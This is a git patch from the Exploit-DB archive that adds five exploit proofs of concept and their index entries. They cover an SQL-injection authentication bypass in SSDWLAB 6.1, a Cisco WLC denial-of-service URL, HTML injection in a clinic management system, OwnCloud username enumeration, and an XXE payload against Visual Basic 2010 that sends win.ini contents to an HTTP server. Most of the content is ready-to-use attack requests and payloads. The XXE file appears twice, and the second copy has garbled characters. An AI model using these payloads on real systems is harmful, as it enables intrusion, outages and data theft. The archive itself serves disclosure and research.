From 6308ce9aaba48699c36a489fc956920fea8d1bb6 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 5 Dec 2019 05:01:46 +0000
Subject: [PATCH] DB: 2019-12-05

5 changes to exploits/shellcodes

Microsoft Visual Basic 2010 Express - XML External Entity Injection
Online Clinic Management System 2.2 - HTML Injection
SSDWLAB 6.1 - Authentication Bypass
Cisco WLC 2504 8.9 - Denial of Service (PoC)
OwnCloud 8.1.8 - Username Disclosure
---
 exploits/aspx/webapps/47742.txt     | 76 +++++++++++++++++++++++
 exploits/hardware/webapps/47744.txt | 15 +++++
 exploits/php/webapps/47741.txt      | 84 +++++++++++++++++++++++++
 exploits/php/webapps/47745.txt      | 40 ++++++++++++
 exploits/xml/local/47743.txt        | 96 +++++++++++++++++++++++++++++
 files_exploits.csv                  |  5 ++
 6 files changed, 316 insertions(+)
 create mode 100644 exploits/aspx/webapps/47742.txt
 create mode 100644 exploits/hardware/webapps/47744.txt
 create mode 100644 exploits/php/webapps/47741.txt
 create mode 100644 exploits/php/webapps/47745.txt
 create mode 100644 exploits/xml/local/47743.txt
diff --git a/exploits/aspx/webapps/47742.txt b/exploits/aspx/webapps/47742.txt
new file mode 100644
index 000000000..1e3dfa242
--- /dev/null
+++ b/exploits/aspx/webapps/47742.txt
@@ -0,0 +1,76 @@
+# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
+# Date: 2019-10-01
+# Exploit Author: Luis Buendía (exoticpayloads)
+# Vendor Homepage: http://www.sbpsoftware.com/
+# Version: 6.1
+# Tested on: IIS 7.5
+# CVE : Pending
+#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.
+
+Request to the EditUserPassword Function
+
+POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
+Host: XXXXXXX.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 462
+SOAPAction: "http://tempuri.org/EditUserPassword"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <EditUserPassword xmlns="http://tempuri.org/">
+      <coUser>' or 1=1 --</coUser>
+      <sOldPwd>string</sOldPwd>
+      <sNewPwd>string</sNewPwd>
+      <coLang>ENG</coLang>
+    </EditUserPassword>
+  </soap:Body>
+</soap:Envelope>
+
+Example of Response when injection is succesfull
+
+HTTP/1.1 200 OK
+Cache-Control: private, max-age=0
+Content-Type: text/xml; charset=utf-8
+X-AspNet-Version: 4.0.30319
+X-Powered-By: XXX.XXX
+Content-Length: 421
+
+<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>
+
+Request to Login After Successful Request
+
+POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
+Host: XXXXXXX.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/Login"
+Content-Length: 406
+
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+  <SOAP-ENV:Body>
+    <tns:Login xmlns:tns="http://tempuri.org/">
+      <tns:sUser>' or 1=1 --</tns:sUser>
+      <tns:sPwd>string</tns:sPwd>
+      <tns:sLang>ENG</tns:sLang>
+    </tns:Login>
+  </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+
+Example of succesfull login
+
+HTTP/1.1 200 OK
+Cache-Control: private, max-age=0
+Content-Type: text/xml; charset=utf-8
+Vary: Accept-Encoding
+X-AspNet-Version: 4.0.30319
+X-Powered-By: XXX.XXX
+Connection: close
+Content-Length: 422
+
+<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47744.txt b/exploits/hardware/webapps/47744.txt
new file mode 100644
index 000000000..aacbc3484
--- /dev/null
+++ b/exploits/hardware/webapps/47744.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2019-11-25
+# Exploit Author: SecuNinja
+# Vendor Homepage: cisco.com
+# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
+# Version: 8.4 to 8.9
+# Tested on: not applicable, works independent from OS
+# CVE : CVE-2019-15276
+
+# Exploit PoC:
+
+https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
+
+# Firing this code will cause the system to reload which results in a DoS condition.
\ No newline at end of file
diff --git a/exploits/php/webapps/47741.txt b/exploits/php/webapps/47741.txt
new file mode 100644
index 000000000..8e9720a62
--- /dev/null
+++ b/exploits/php/webapps/47741.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
+# Software : Online Clinic Management System
+# Version : 2.2
+# Vulernability Type : HTML Injection
+# Vulenrability : HTM Injection
+
+# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
+# add disase symptom, patient and appointment section.
+# payload: <b><i>asd</i></b>
+
+# HTTP POST request
+
+POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+POST /clinic/disease_symptoms_view.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------325041947016922
+Content-Length: 1501
+Origin: http://10.10.10.160
+Connection: close
+Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
+Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
+Upgrade-Insecure-Requests: 1
+
+ -----------------------------325041947016922
+Content-Disposition: form-data; name="current_view"
+
+ DV
+-----------------------------325041947016922
+
+Content-Disposition: form-data; name="SortField"
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SelectedID"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SelectedField"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SortDirection"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="FirstRecord"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="NoDV"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="PrintDV"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="DisplayRecords" 
+
+all
+-----------------------------325041947016922
+Content-Disposition: form-data; name="disease"
+
+<b><i>asd</i></b>
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="symptoms"
+
+<b><i>asd</i></b>
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="reference"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="update_x"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SearchString"
+-----------------------------325041947016922--
\ No newline at end of file
diff --git a/exploits/php/webapps/47745.txt b/exploits/php/webapps/47745.txt
new file mode 100644
index 000000000..e9e0e5536
--- /dev/null
+++ b/exploits/php/webapps/47745.txt
@@ -0,0 +1,40 @@
+# Exploit Title: OwnCloud 8.1.8 - Username Disclosure
+# Exploit Author : Daniel Moreno
+# Exploit Date: 2019-11-29
+# Vendor Homepage :  https://owncloud.org/  
+# Link Software :  https://ftp.icm.edu.pl/packages/owncloud/  (old version. Download at your own risk) 
+# Tested on OS: CentOS
+
+# PoC:
+# 1. Create an account in OwnCloud
+# 2. Intercept connection with Burp
+# 3. Share a file, typing anything
+
+---------------------------------------------------------
+4. Burp will capture this request
+
+GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
+HTTP/1.1
+Host: XXXXXXXXXXXXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+requesttoken: XXXXXXXXXXXXXXXXXXX
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: https://domain.com/index.php/apps/files/
+Cookie: XXXXXXXXXXXXXXXX
+---------------------------------------------------------------------
+
+5. Send to Repeater
+
+6. Change GET parameter to THIS:
+
+GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
+HTTP/1.1
+
+
+7. Return valeus will be a JSON with all username informations
\ No newline at end of file
diff --git a/exploits/xml/local/47743.txt b/exploits/xml/local/47743.txt
new file mode 100644
index 000000000..bf47458f4
--- /dev/null
+++ b/exploits/xml/local/47743.txt
@@ -0,0 +1,96 @@
+# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2019-12-03
+# Version Software : 10.0.30319.1 RTMRel
+# Vendor Homepage : https://www.microsoft.com/
+# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
+# Tested on OS: Windows 7
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software Microsoft Visual Basic 2010
+5) Drag the file (.xml) in a VB project
+6) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+[+] Payload.dtd :
+=================
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
+
+
+Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt
+
+ï»¿# Exploit Title: Microsoft Visual BasicÂ 2010 Express - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2019-12-03
+# Version Software : 10.0.30319.1 RTMRel
+# Vendor Homepage : https://www.microsoft.com/
+# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
+# Tested on OS: Windows 7 
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software Microsoft Visual BasicÂ 2010
+5) Drag the file (.xml) in a VB project
+6) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+[+] Payload.dtd :
+=================
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 29a3b9ff1..a730dbf47 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10824,6 +10824,7 @@ id,file,description,date,author,type,platform,port
 47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
 47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
 47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
+47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42051,3 +42052,7 @@ id,file,description,date,author,type,platform,port
 47737,exploits/php/webapps/47737.txt,"Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting",2019-12-03,"Cemal Cihad ÇİFTÇİ",webapps,php,
 47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
+47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47742,exploits/aspx/webapps/47742.txt,"SSDWLAB 6.1 - Authentication Bypass",2019-12-04,"Luis Buendía",webapps,aspx,
+47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
+47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,
